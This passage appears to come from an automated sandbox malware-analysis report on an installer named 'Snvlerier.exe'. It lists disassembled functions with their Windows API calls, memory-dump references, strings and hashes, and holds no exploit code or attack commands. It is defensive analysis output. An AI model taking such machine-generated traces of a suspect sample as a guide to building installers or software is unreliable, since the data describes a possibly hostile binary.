                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405B87
                                              • GlobalFree.KERNEL32(00000000), ref: 00405B8E
                                              • CloseHandle.KERNEL32(00000000), ref: 00405B95
                                                • Part of subcall function 0040599B: GetFileAttributesA.KERNELBASE(00000003,00402CC6,C:\Users\user\Desktop\Snvlerier.exe,80000000,00000003), ref: 0040599F
                                                • Part of subcall function 0040599B: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                              • String ID: %s=%s$NUL$[Rename]$p"B$p&B
                                              • API String ID: 3756836283-2965949610
                                              • Opcode ID: ee63fd4413910ec6b5e47e6c31fd47c6eb8b917f88a5d39bf23564fed63f5f5b
                                              • Instruction ID: 677867e2868f0334f9dd861088347edfb2f3670c971fe07efef79e741bd504c3
                                              • Opcode Fuzzy Hash: ee63fd4413910ec6b5e47e6c31fd47c6eb8b917f88a5d39bf23564fed63f5f5b
                                              • Instruction Fuzzy Hash: 9241E371608B15AFD3206B21AC89F6B7A6CEF45754F14043AFE05B62D2D67CB8018E7D
                                              APIs
                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,?), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextA.USER32(00000000,Nonchaotically Setup,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F$Nonchaotically Setup
                                              • API String ID: 941294808-2112317783
                                              • Opcode ID: 91df16c023ae8df03750c0d3b950661686445fb463a43ec95ce7f6bbba5dedab
                                              • Instruction ID: ac163827dcc045b423da34c80c8b8bf1de35ea3e6fac44f86429bcb2d872fe26
                                              • Opcode Fuzzy Hash: 91df16c023ae8df03750c0d3b950661686445fb463a43ec95ce7f6bbba5dedab
                                              • Instruction Fuzzy Hash: 30419A72804249AFCB058F95CD459AFBBB9FF44311F00812AF961AA1A0C778EA50DFA5
                                              APIs
                                              • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Snvlerier.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403225,C:\Users\user\AppData\Local\Temp\,74DF3410,004033FA), ref: 00405FB0
                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405FBD
                                              • CharNextA.USER32(?,"C:\Users\user\Desktop\Snvlerier.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403225,C:\Users\user\AppData\Local\Temp\,74DF3410,004033FA), ref: 00405FC2
                                              • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403225,C:\Users\user\AppData\Local\Temp\,74DF3410,004033FA), ref: 00405FD2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\Snvlerier.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 589700163-4164304465
                                              • Opcode ID: 0a6f6ff6588ae7694a668fee5d64cb148e66787f948d30978ce214d116b0dfe6
                                              • Instruction ID: 8013c2a85f4e50ea3324d98f8426ca6b40b0771b40bd98725f800da14f37a416
                                              • Opcode Fuzzy Hash: 0a6f6ff6588ae7694a668fee5d64cb148e66787f948d30978ce214d116b0dfe6
                                              • Instruction Fuzzy Hash: 2E11C451808B9629EB3216285D44F776F98CB57760F18047FE9C0723C2D67D9C439A6D
                                              APIs
                                              • GetWindowLongA.USER32(?,000000EB), ref: 00404081
                                              • GetSysColor.USER32(00000000), ref: 0040409D
                                              • SetTextColor.GDI32(?,00000000), ref: 004040A9
                                              • SetBkMode.GDI32(?,?), ref: 004040B5
                                              • GetSysColor.USER32(?), ref: 004040C8
                                              • SetBkColor.GDI32(?,?), ref: 004040D8
                                              • DeleteObject.GDI32(?), ref: 004040F2
                                              • CreateBrushIndirect.GDI32(?), ref: 004040FC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                              • Instruction ID: a1e252506ad679c8d84235dba062589f51376c3eb81c17319083cf660c7f3183
                                              • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                              • Instruction Fuzzy Hash: 2121C6B1904704ABC7309F78DD08B4BBBF8AF41714F048629EA95F62E1C778E944CB55
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,00046400,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026E1
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026FD
                                              • GlobalFree.KERNEL32(?), ref: 00402736
                                              • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402748
                                              • GlobalFree.KERNEL32(00000000), ref: 0040274F
                                              • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402767
                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040277B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                              • String ID:
                                              • API String ID: 3294113728-0
                                              • Opcode ID: 42769c200c6a7d1eeef0ef180ed33fe4e8383c2a1b3049db3dd4a8fb981ead7f
                                              • Instruction ID: 025574d3d22bd54d85f7918281ffcd463f5c22ec69759c7bd30840206fd4fb84
                                              • Opcode Fuzzy Hash: 42769c200c6a7d1eeef0ef180ed33fe4e8383c2a1b3049db3dd4a8fb981ead7f
                                              • Instruction Fuzzy Hash: 7231AD71C00128BBCF216FA5DD89DAE7E79EF09364F10422AF420762E1C6785D408BA9
                                              APIs
                                              • lstrlenA.KERNEL32(0041FCC0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C5B,00000000,?), ref: 00405033
                                              • lstrlenA.KERNEL32(00402C5B,0041FCC0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C5B,00000000), ref: 00405043
                                              • lstrcatA.KERNEL32(0041FCC0,00402C5B,00402C5B,0041FCC0,00000000,00000000,00000000), ref: 00405056
                                              • SetWindowTextA.USER32(0041FCC0,0041FCC0), ref: 00405068
                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040508E
                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050A8
                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                              • String ID:
                                              • API String ID: 2531174081-0
                                              • Opcode ID: 00d767ca6d21adb0e40550c88dac8e1de9281ca4eac8080487ceaa25908f8972
                                              • Instruction ID: cd0d5c60904d2c2f5b4d5aa0166abca481ec9a381751cdb24649c38e988b3603
                                              • Opcode Fuzzy Hash: 00d767ca6d21adb0e40550c88dac8e1de9281ca4eac8080487ceaa25908f8972
                                              • Instruction Fuzzy Hash: 8C218C71900508BADB219FA5DD84ADFBFB9EF05354F14807BF904B6290C7399A418FA8
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402BFC
                                              • GetTickCount.KERNEL32 ref: 00402C1A
                                              • wsprintfA.USER32 ref: 00402C48
                                                • Part of subcall function 00404FFA: lstrlenA.KERNEL32(0041FCC0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C5B,00000000,?), ref: 00405033
                                                • Part of subcall function 00404FFA: lstrlenA.KERNEL32(00402C5B,0041FCC0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C5B,00000000), ref: 00405043
                                                • Part of subcall function 00404FFA: lstrcatA.KERNEL32(0041FCC0,00402C5B,00402C5B,0041FCC0,00000000,00000000,00000000), ref: 00405056
                                                • Part of subcall function 00404FFA: SetWindowTextA.USER32(0041FCC0,0041FCC0), ref: 00405068
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040508E
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050A8
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050B6
                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C6C
                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C7A
                                                • Part of subcall function 00402BC8: MulDiv.KERNEL32(0001FC1C,00000064,0002240F), ref: 00402BDD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                              • String ID: ... %d%%
                                              • API String ID: 722711167-2449383134
                                              • Opcode ID: d74c3b8545a895c7c82878880814235765f9c314de05fe31fccc1a8d8e7f3541
                                              • Instruction ID: 29dc4b32da6a2a8b1de7b0fabf44a64de4b61d77cdf611fcbd62c7f3829b9fcb
                                              • Opcode Fuzzy Hash: d74c3b8545a895c7c82878880814235765f9c314de05fe31fccc1a8d8e7f3541
                                              • Instruction Fuzzy Hash: 10018870909210ABE721AF60AF4DA9F7B78AB04705B054077FA05B11E1C6B89945C69E
                                              APIs
                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048E0
                                              • GetMessagePos.USER32 ref: 004048E8
                                              • ScreenToClient.USER32(?,?), ref: 00404902
                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404914
                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040493A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                              • Instruction ID: 0f975f8c43fdf986e5c7bebc27ff5205db20c67e0ce2fb34c198a187cd2e1e55
                                              • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                              • Instruction Fuzzy Hash: A5015E71D00219BAEB01DBA4DD85FFFBBBCAF55711F10412BBA10B62D0D7B4A9018BA5
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
                                              • wsprintfA.USER32 ref: 00402B9B
                                              • SetWindowTextA.USER32(?,?), ref: 00402BAB
                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                              • API String ID: 1451636040-1158693248
                                              • Opcode ID: 4f3af02ce79472b52154094e4888787b2f720e113d99de0faa78a382140bcdff
                                              • Instruction ID: 76da328885fac8a2143a537126e4462c46d7a78a1418b81ccde45bfa4a24e30c
                                              • Opcode Fuzzy Hash: 4f3af02ce79472b52154094e4888787b2f720e113d99de0faa78a382140bcdff
                                              • Instruction Fuzzy Hash: 7DF0127050020CAADF255F50CD0ABAE3779AB04345F00813AFA15B51D1D7F969558B99
                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
                                                • Part of subcall function 00404FFA: lstrlenA.KERNEL32(0041FCC0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C5B,00000000,?), ref: 00405033
                                                • Part of subcall function 00404FFA: lstrlenA.KERNEL32(00402C5B,0041FCC0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C5B,00000000), ref: 00405043
                                                • Part of subcall function 00404FFA: lstrcatA.KERNEL32(0041FCC0,00402C5B,00402C5B,0041FCC0,00000000,00000000,00000000), ref: 00405056
                                                • Part of subcall function 00404FFA: SetWindowTextA.USER32(0041FCC0,0041FCC0), ref: 00405068
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040508E
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050A8
                                                • Part of subcall function 00404FFA: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050B6
                                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                              • String ID: `?B
                                              • API String ID: 2987980305-2006587570
                                              • Opcode ID: b917dd5f8b80eed479844e1a54b17d4901cc4c7bf78675f2817a051220bacfb3
                                              • Instruction ID: 6e45f79f952a912fb6f0c8dd9676565c16bc1fc715f6f1fd78cbef8f7071b090
                                              • Opcode Fuzzy Hash: b917dd5f8b80eed479844e1a54b17d4901cc4c7bf78675f2817a051220bacfb3
                                              • Instruction Fuzzy Hash: E3212B72D04211BBCF20BF64DE89A6E79B0AF44358F20413BF601B62D1D7BD4941DA5E
                                              APIs
                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A68
                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
                                              • RegCloseKey.ADVAPI32(?), ref: 00402AAD
                                              • RegCloseKey.ADVAPI32(?), ref: 00402AD2
                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: Close$DeleteEnumOpen
                                              • String ID:
                                              • API String ID: 1912718029-0
                                              • Opcode ID: 94e579df0ca383e21f0f03cfbe771d52e1aac962910b89c3aa5ba84f7e4d659d
                                              • Instruction ID: b8ae1fed374d02c96d4d396225367d785f04057ff57801cd0def4f598ab15ca9
                                              • Opcode Fuzzy Hash: 94e579df0ca383e21f0f03cfbe771d52e1aac962910b89c3aa5ba84f7e4d659d
                                              • Instruction Fuzzy Hash: 02117F31A00109FFDF219F90DE49DAE3B7DEB04349F104136FA06A00A0D7B88E51AF69
                                              APIs
                                              • GetDlgItem.USER32(?), ref: 00401CD0
                                              • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                              • DeleteObject.GDI32(00000000), ref: 00401D1B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1823569647.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1823555406.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823586791.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823601812.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1823685656.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Snvlerier.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: 82725a7429594cd5becff5a5a16b3cbfdc4e7fc63babc93e7993a93595dd14ac
                                              • Instruction ID: 6ebbffb4e85b6008425c9e917fd4feaf151da85c341b159ab14f88d2c56c0d1e
                                              • Opcode Fuzzy Hash: 82725a7429594cd5becff5a5a16b3cbfdc4e7fc63babc93e7993a93595dd14ac
                                              • Instruction Fuzzy Hash: 7EF0FFB2A05114BFE701EBA4EE89DAFB7BCEB44301B104576F501F2191C678AD018B79
                                              APIs
                                              • GetDC.USER32(?), ref: 00401D29
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                              • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                              • CreateFontIndirectA.GDI32(0040AFB8), ref: 00401DA1
                                              Memory Dump Source
